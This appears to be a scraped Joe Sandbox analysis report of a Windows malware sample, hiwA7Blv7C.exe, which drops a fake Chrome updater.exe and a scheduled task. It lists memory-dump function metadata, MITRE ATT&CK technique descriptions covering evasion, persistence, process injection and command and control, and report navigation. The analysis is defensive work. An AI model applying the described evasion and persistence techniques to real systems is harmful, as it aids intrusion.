Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: 0c33aa86fb6af781ab4bd2801129ac058fc1aff8e06ccd9e83e02b0cf9a38ee3
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: 1871B23720178185E7299EA5984C3BA77A4F78BB87F660116DD0A73F89DE39C785C700

Function 0000023C9FD994A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000023C9FD994F0
RaiseException.KERNEL32 ref: 0000023C9FD99531

Strings

csm, xrefs: 0000023C9FD9951E

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: da9330c3968a2f4648570f24bcb8dedcce468af78ba686aeb91ff33026581370
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: BD113D37215B8082EB618F15F44436A77E5F788B99F694220EE8C17758DF3CC691CB04

Function 0000023C9FD91BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000023C9FD91C2D
HeapAlloc.KERNEL32 ref: 0000023C9FD91C3B
GetProcessHeap.KERNEL32 ref: 0000023C9FD91C77
HeapFree.KERNEL32 ref: 0000023C9FD91C85

Part of subcall function 0000023C9FD9152C: StrCmpIW.SHLWAPI ref: 0000023C9FD9155D

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: fb274fbcc73c847d3c6e09d570d25983daaf9cd5edc6c7e414eda49a85b8252f
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: 9B113D26602B4481EA55DFA6A40833967A1FB89FC6F2A4124DE4D67765DE3CC5828300

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hiwA7Blv7C.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kxbd2xgx.yhf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l05upsxx.v0u.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzlp1tjc.hxo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uozdtlcq.k1w.psm1

C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp

C:\Users\user\AppData\Local\Temp\qdsaknsehgak.xml

C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
hiwA7Blv7C.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre